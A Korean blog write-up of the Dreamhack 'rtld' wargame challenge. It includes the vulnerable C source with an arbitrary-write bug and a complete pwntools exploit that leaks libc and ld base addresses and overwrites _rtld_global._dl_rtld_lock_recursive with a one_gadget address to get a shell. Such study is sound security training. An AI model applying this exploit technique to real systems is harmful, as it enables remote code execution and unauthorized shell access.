rtld

🌇│System_Study/📕│Dreamhack_Hacking

rtld

Jastes 2022. 11. 13. 23:00

참고로 rtld는 return to LD library 라고 추측하시는 분이 있으시더라고요
저도 어느정도 그러지 않을까?(여기 로되리안처럼 ㅎ)

rtld

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43 // gcc -o rtld rtld.c -fPIC -pie
 
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <dlfcn.h>
 
void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}
 
void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    signal(SIGALRM, alarm_handler);
    alarm(60);
}
 
void get_shell() {
    system("/bin/sh");
}
 
int main()
{
    long addr;
    long value; 
 
    initialize();
 
    printf("stdout: %p\n", stdout);
 
    printf("addr: ");
    scanf("%ld", &addr);
 
    printf("value: ");
    scanf("%ld", &value);
 
    *(long *)addr = value;
    return 0;
}
 
Colored by Color Scripter cs

stdout이 출력되니까 lib_base를 구하며, 임의 주소 쓰기 취약점이 존재합니다.
get_shell()함수가 있으므로..

stdout이 출력되니까 lib_base를 구하며, 임의 주소 쓰기 취약점(전에 했던)이 존재
get_shell() 함수가 있으므로 NX도 우회되고 나머지 취약점은 인자로 하니까 ㅇㅋ

즉, 임의 주소 쓰기 취약점을 이용 dl_rtld_lock_recursive를
get_shell()로 덮어 쉘을 따면 셸을 획득할 수 있겠습니다.
아니면 Partial RELRO니까 GOT Overwrite 해도 되겠네요

_rtld_global._dl_rtld_lock_recursive : func addr
_rtld_global._dl_load_lock : fun avgs

Exploit 코드

1. lib_base & ld_base leak | dl_load_lock & dl_rtld_lock_recursive

위 이미지를 보시면 libc.so.6(docker에서 확인 할 수 있는거 같은데 도커 환경 구축 및 기타 공부.. ㅠ)
environ 심볼을 찾는 명령어를 실행한 모습입니다.

실행 결과를 살펴보면, __environ이라는 이름의 전역 변수가 존재합니다.
이는 시스템 명령어를 실행하기 위한 execve 계열의 함수와 getenv 등 환경변수와 관련된 함수 참조 변수로
그렇다면, 앞서 컴파일 한 예제를 디버깅하여 해당 포인터에 어떤 주소가 있는지 확인해봅시다.

이 _rtld_global._dl_rtld_recursive에는 libc 주소가 적혀있는데, 이 주소를 one_gadget을 한다면
RET_Overwrite가 되겠습니다. 그리고 libc_base와 ld_base의 거리를 구하면..

그것을 토대로 one-gadget으로 익스를 작성해봅시다(다른 방법도 있을건데.. rtld의 형식으로)
하지만 로되리안으로 라이브러리 함수의 변동이 있다고 다들 그러셔서 바로 one-gadget으로 ㄱ

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31 from pwn import *
 
p = remote("host3.dreamhack.games", 11820)
e = ELF("./rtld", checksec=False)
libc = ELF("libc.so.6")
ld = ELF("/lib/x86_64-linux-gnu/ld-2.23.so")
 
one_gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
 
#context.log_level = 'debug'
 
 
p.recvuntil("stdout: ")
 
stdout = int(p.recvuntil("\n"), 16)
libc_base = stdout - libc.symbols['_IO_2_1_stdout_']
ld_base = libc_base + 0x3ca000
 
 
rtld_global = ld_base + ld.symbols['_rtld_global']
dl_load_lock = rtld_global + 2312
dl_rtld_lock_recursive = rtld_global + 3848
 
 
one = libc_base + one_gadget[3]
 
p.sendlineafter("addr: ", str(dl_rtld_lock_recursive))
p.sendlineafter("value: ", str(one))
 
p.interactive()
 
Colored by Color Scripter cs

참고로 저는 잘 안되서 Dreamhack Q&A를 살펴보던 중.. 저에게 무지 도움되는..
저처럼 구조체의 오프셋 등이 안되는 환경에선 강추!(아님 도커로 환경 구축을 해야하는데)

ld base와 해당 버전 ld에서의 구조체 오프셋

문제에 libc.so.6 파일은 포함되어 있으나, ld파일은 따로포함되어있지 않았어서 so 파일의 오프셋만 가지고 풀이가 가능한 줄 알고 우분투 18.04 에서 풀이를 진행하다 …

dreamhack.io

위 툴을 사용해 ldd의 링킹을 패치하기

patchelf

A small utility to modify the dynamic linker and RPATH of ELF executables.

pypi.org

GitHub - NixOS/patchelf: A small utility to modify the dynamic linker and RPATH of ELF executables

A small utility to modify the dynamic linker and RPATH of ELF executables - GitHub - NixOS/patchelf: A small utility to modify the dynamic linker and RPATH of ELF executables

github.com

해당 패치한 lib의 파일

...

이 부분은 솔직히 좀 이해가 잘.. 실습도 안되서 다시 한 번 꼭 살펴봐야겠네요

참고 자료

참고 이미지

저작자표시 비영리 변경금지